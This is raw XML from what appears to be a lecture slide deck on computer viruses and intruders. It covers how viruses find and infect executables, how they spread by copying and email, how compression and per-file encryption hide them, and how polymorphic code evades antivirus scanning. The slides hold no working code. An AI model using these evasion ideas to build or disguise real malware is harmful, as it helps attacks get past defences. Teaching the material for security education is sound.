          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="257175" y="1781175"/>
            <a:ext cx="3250113" cy="4772025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>	Recursive procedure that finds executable files on a UNIX system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>	Virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>could</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>	infect some or them </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65540" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3983277" y="1607333"/>
            <a:ext cx="5074999" cy="5250667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35855183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4" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="24980" t="43234" r="21011" b="38284"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="884744" y="1518149"/>
            <a:ext cx="6882632" cy="3333088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>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9CA92B37-FDB5-4996-ADE6-A2705142A2BB}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="0"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>How Viruses Work (3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4651375"/>
            <a:ext cx="9144000" cy="1914525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3100" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>An executable program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3100" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>With a virus at the front</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3100" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>With the virus at the end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3100" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>With a virus spread over free space within program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15553274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8597900" y="6477000"/>
            <a:ext cx="546100" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{002B9CFA-8ECB-4EDD-A59B-14359BF1116D}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33794" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485900" y="165100"/>
            <a:ext cx="6629400" cy="876300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>How Viruses Spread</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600075" y="1695450"/>
            <a:ext cx="7772400" cy="4286250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Virus placed where likely to be copied</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>When copied</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>infects programs on hard drive, floppy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>may try to spread over LAN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Attach to innocent looking email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>when it runs, use mailing list to replicate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="729867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Hiding a virus in a file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1917700"/>
            <a:ext cx="4699819" cy="4473052"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Start with an uninfected program; Add the virus to the end of the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem: file size changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Solution: compression</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compressed infected program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Decompressor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: for running executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compressor: for compressing newly infected binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pad with free space (if needed) to make the file length the same </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem (for virus writer): virus easy to recognize by anti-virus software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B9C31318-8D1F-46D0-AD3E-FD5CE0C4604B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4700741" y="1772112"/>
            <a:ext cx="4324350" cy="4257675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21195936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encryption to hide a virus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1927748"/>
            <a:ext cx="4942816" cy="4367213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hide virus by encrypting it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Choose a different key for each infected file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Virus “code” varies in each infected file, to prevent detection by anti-virus software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem: lots of common code still in the clear</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compressor / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>decompressor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Encryptor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>decryptor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even better: leave only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>decryptor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and key in the clear </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Less constant per virus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B9C31318-8D1F-46D0-AD3E-FD5CE0C4604B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4733772" y="1822194"/>
            <a:ext cx="4238625" cy="4314825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23472739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6FA0A5CD-0B0F-490A-A378-3F1520DA1481}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35842" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="338202"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Polymorphic Viruses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754856" y="5183886"/>
            <a:ext cx="7772400" cy="1212850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All of these code sequences do the same thing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All of them are very different in machine code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use “snippets” combined in random ways to hide code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35845" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="338138" y="1654175"/>
            <a:ext cx="8605837" cy="2889250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17008533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8597900" y="6477000"/>
            <a:ext cx="546100" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E89E4FC7-9DC1-4AE1-9763-58548210638F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5122" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Intruders</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5123" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600074" y="1789002"/>
            <a:ext cx="8280879" cy="5419725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Common Categories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Casual prying by nontechnical users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Snooping by insiders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Determined attempt to make money</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Commercial or military espionage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8597900" y="6477000"/>
            <a:ext cx="546100" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3FBA24B9-DFAB-4BC4-A6E5-0574574A8BCF}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36866" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="591159"/>
            <a:ext cx="8839200" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Antivirus and Anti-Antivirus Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186813" y="1903956"/>
